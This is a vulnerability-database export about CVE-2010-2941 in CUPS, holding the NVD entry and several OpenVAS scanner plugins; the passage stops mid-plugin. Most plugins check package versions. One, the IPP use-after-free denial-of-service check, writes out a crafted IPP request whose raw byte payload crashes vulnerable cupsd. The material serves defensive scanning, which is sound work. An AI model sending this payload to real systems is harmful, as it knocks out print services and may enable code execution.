{"cve": [{"lastseen": "2017-08-17T11:14:54", "bulletinFamily": "NVD", "description": "ipp.c in cupsd in CUPS 1.4.4 and earlier does not properly allocate memory for attribute values with invalid string data types, which allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly execute arbitrary code via a crafted IPP request.", "modified": "2017-08-16T21:32:52", "published": "2010-11-05T13:00:01", "id": "CVE-2010-2941", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2941", "title": "CVE-2010-2941", "type": "cve", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:54", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2010-333-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=68672", "id": "OPENVAS:68672", "title": "Slackware Advisory SSA:2010-333-01 cups ", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2010_333_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New cups packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\nand -current to fix security issues.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2010-333-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2010-333-01\";\n \nif(description)\n{\n script_id(68672);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2010-2941\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n script_name(\"Slackware Advisory SSA:2010-333-01 cups \");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-2_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.4.5-i486-1_slack13.1\", rls:\"SLK13.1\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:05:29", "bulletinFamily": "scanner", "description": "This host is running CUPS and is prone to Denial of Service vulnerability.", "modified": "2018-06-25T00:00:00", "published": "2010-11-18T00:00:00", "id": "OPENVAS:1361412562310800182", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800182", "title": "CUPS IPP Use-After-Free Denial of Service Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cupsd_ipp_use_after_free_dos_vuln.nasl 10317 2018-06-25 14:09:46Z cfischer $\n#\n# CUPS IPP Use-After-Free Denial of Service Vulnerability\n#\n# Authors:\n# Veerendra G.G <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:cups\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800182\");\n script_version(\"$Revision: 10317 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-06-25 16:09:46 +0200 (Mon, 25 Jun 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-18 06:30:08 +0100 (Thu, 18 Nov 2010)\");\n script_bugtraq_id(44530);\n script_cve_id(\"CVE-2010-2941\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"CUPS IPP Use-After-Free Denial of Service Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_cups_detect.nasl\");\n script_require_ports(\"Services/www\", 631);\n script_mandatory_keys(\"CUPS/installed\");\n\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/62882\");\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=624438\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the remote unauthenticated attackers to\n cause a denial of service (use-after-free and application crash) or possibly\n execute arbitrary code via a crafted IPP request.\n\n Impact Level: Application\");\n\n script_tag(name:\"affected\", value:\"CUPS 1.4.4 and prior\");\n\n script_tag(name:\"insight\", value:\"The flaw is caused by improper allocation of memory for attribute values\n with invalid string data type.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to 1.4.5 or above,\n For updates refer to http://www.cups.org/software.php\");\n\n script_tag(name:\"summary\", value:\"This host is running CUPS and is prone to Denial of Service vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nhost = http_host_name( port:port );\n\nif( ! soc = open_sock_tcp( port ) ) exit( 0 );\n\npost_data = string( 'POST /ipp/ HTTP/1.1\\r\\n',\n 'Host: ' + host + '\\r\\n',\n 'User-Agent: CUPS/1.3.4\\r\\n',\n 'Content-Type: application/ipp\\r\\n',\n 'Content-Length: 289\\r\\n',\n 'Expect: 100-continue\\r\\n\\r\\n'\n );\n\nraw_data = raw_string( 0x01, 0x01, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x01, 0x01,\n 0x47, 0x00, 0x12, 0x61, 0x74, 0x74, 0x72, 0x69, 0x62,\n 0x75, 0x74, 0x65, 0x73, 0x2d, 0x63, 0x68, 0x61, 0x72,\n 0x73, 0x65, 0x74, 0x00, 0x05, 0x75, 0x74, 0x66, 0x2d,\n 0x38, 0x48, 0x00, 0x1b, 0x61, 0x74, 0x74, 0x72, 0x69,\n 0x62, 0x75, 0x74, 0x65, 0x73, 0x2d, 0x6e, 0x61, 0x74,\n 0x75, 0x72, 0x61, 0x6c, 0x2d, 0x6c, 0x61, 0x6e, 0x67,\n 0x75, 0x61, 0x67, 0x65, 0x00, 0x05, 0x65, 0x6e, 0x2d,\n 0x75, 0x73, 0x45, 0x00, 0x0b, 0x70, 0x72, 0x69, 0x6e,\n 0x74, 0x65, 0x72, 0x2d, 0x75, 0x72, 0x69, 0x00, 0x1b,\n 0x69, 0x70, 0x70, 0x3a, 0x2f, 0x2f, 0x31, 0x30, 0x2e,\n 0x31, 0x30, 0x2e, 0x31, 0x30, 0x2e, 0x32, 0x35, 0x31,\n 0x3a, 0x36, 0x33, 0x31, 0x2f, 0x69, 0x70, 0x70, 0x2f,\n 0x38, 0x00, 0x14, 0x72, 0x65, 0x71, 0x75, 0x65, 0x73,\n 0x74, 0x65, 0x64, 0x2d, 0x61, 0x74, 0x74, 0x72, 0x69,\n 0x62, 0x75, 0x74, 0x65, 0x73, 0x00, 0x10, 0x63, 0x6f,\n 0x70, 0x69, 0x65, 0x73, 0x2d, 0x73, 0x75, 0x70, 0x70,\n 0x6f, 0x72, 0x74, 0x65, 0x64, 0x44, 0x00, 0x00, 0x00,\n 0x19, 0x64, 0x6f, 0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74,\n 0x2d, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x2d, 0x73,\n 0x75, 0x70, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x44,\n 0x00, 0x00, 0x00, 0x19, 0x70, 0x72, 0x69, 0x6e, 0x74,\n 0x65, 0x72, 0x2d, 0x69, 0x73, 0x2d, 0x61, 0x63, 0x63,\n 0x65, 0x70, 0x74, 0x69, 0x6e, 0x67, 0x2d, 0x6a, 0x6f,\n 0x62, 0x73, 0x44, 0x00, 0x00, 0x00, 0x0d, 0x70, 0x72,\n 0x69, 0x6e, 0x74, 0x65, 0x72, 0x2d, 0x73, 0x74, 0x61,\n 0x74, 0x65, 0x44, 0x00, 0x00, 0x00, 0x15, 0x70, 0x72,\n 0x69, 0x6e, 0x74, 0x65, 0x72, 0x2d, 0x73, 0x74, 0x61,\n 0x74, 0x65, 0x2d, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67,\n 0x65, 0x44, 0x00, 0x00, 0x00, 0x15, 0x70, 0x72, 0x69,\n 0x6e, 0x74, 0x65, 0x72, 0x2d, 0x73, 0x74, 0x61, 0x74,\n 0x65, 0x2d, 0x72, 0x65, 0x61, 0x73, 0x6f, 0x6e, 0x73,\n 0x03\n );\n\nsend( socket:soc, data:post_data );\nsend( socket:soc, data:raw_data );\n\nclose( soc );\nsleep( 5 );\n\nsoc = open_sock_tcp( port );\nif( ! soc ) {\n security_message( port:port );\n exit( 0 );\n}\n\nclose( soc );\nexit( 99 );\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-28T18:24:35", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2010-0866", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310122252", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122252", "title": "Oracle Linux Local Check: ELSA-2010-0866", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-0866.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122252\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:15:29 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-0866\");\n script_tag(name:\"insight\", value:\"ELSA-2010-0866 - cups security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-0866\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-0866.html\");\n script_cve_id(\"CVE-2010-2941\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.2~35.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.4.2~35.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.4.2~35.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.4.2~35.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-php\", rpm:\"cups-php~1.4.2~35.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:00:40", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2010-333-01.", "modified": "2018-04-06T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231068672", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231068672", "title": "Slackware Advisory SSA:2010-333-01 cups ", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2010_333_01.nasl 9352 2018-04-06 07:13:02Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New cups packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\nand -current to fix security issues.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2010-333-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2010-333-01\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.68672\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_cve_id(\"CVE-2010-2941\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 9352 $\");\n script_name(\"Slackware Advisory SSA:2010-333-01 cups \");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.3.11-i486-2_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"cups\", ver:\"1.4.5-i486-1_slack13.1\", rls:\"SLK13.1\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:05:02", "bulletinFamily": "scanner", "description": "Check for the Version of cups", "modified": "2018-01-03T00:00:00", "published": "2010-12-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862590", "id": "OPENVAS:1361412562310862590", "type": "openvas", "title": "Fedora Update for cups FEDORA-2010-17641", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for cups FEDORA-2010-17641\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"cups on Fedora 14\";\ntag_insight = \"The Common UNIX Printing System provides a portable printing layer for\n UNIX® operating systems. It has been developed by Easy Software Products\n to promote a standard printing solution for all UNIX vendors and users.\n CUPS provides the System V and Berkeley command-line interfaces.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-November/050977.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862590\");\n script_version(\"$Revision: 8274 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 08:28:17 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-17641\");\n script_cve_id(\"CVE-2010-2941\");\n script_name(\"Fedora Update for cups FEDORA-2010-17641\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.4~11.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:53:58", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1012-1", "modified": "2017-12-29T00:00:00", "published": "2010-11-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840531", "id": "OPENVAS:1361412562310840531", "type": "openvas", "title": "Ubuntu Update for cups, cupsys vulnerability USN-1012-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1012_1.nasl 8258 2017-12-29 07:28:57Z teissa $\n#\n# Ubuntu Update for cups, cupsys vulnerability USN-1012-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Emmanuel Bouillon discovered that CUPS did not properly handle certain\n Internet Printing Protocol (IPP) packets. A remote attacker could use this\n flaw to cause a denial of service or possibly execute arbitrary code. In\n the default installation in Ubuntu 8.04 LTS and later, attackers would be\n isolated by the CUPS AppArmor profile.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1012-1\";\ntag_affected = \"cups, cupsys vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1012-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840531\");\n script_version(\"$Revision: 8258 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 08:28:57 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1012-1\");\n script_cve_id(\"CVE-2010-2941\");\n script_name(\"Ubuntu Update for cups, cupsys vulnerability USN-1012-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cups-bsd\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-client\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-dbg\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsdriver1-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsdriver1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsppdc1-dev\", ver:\"1.4.1-5ubuntu2.7\", 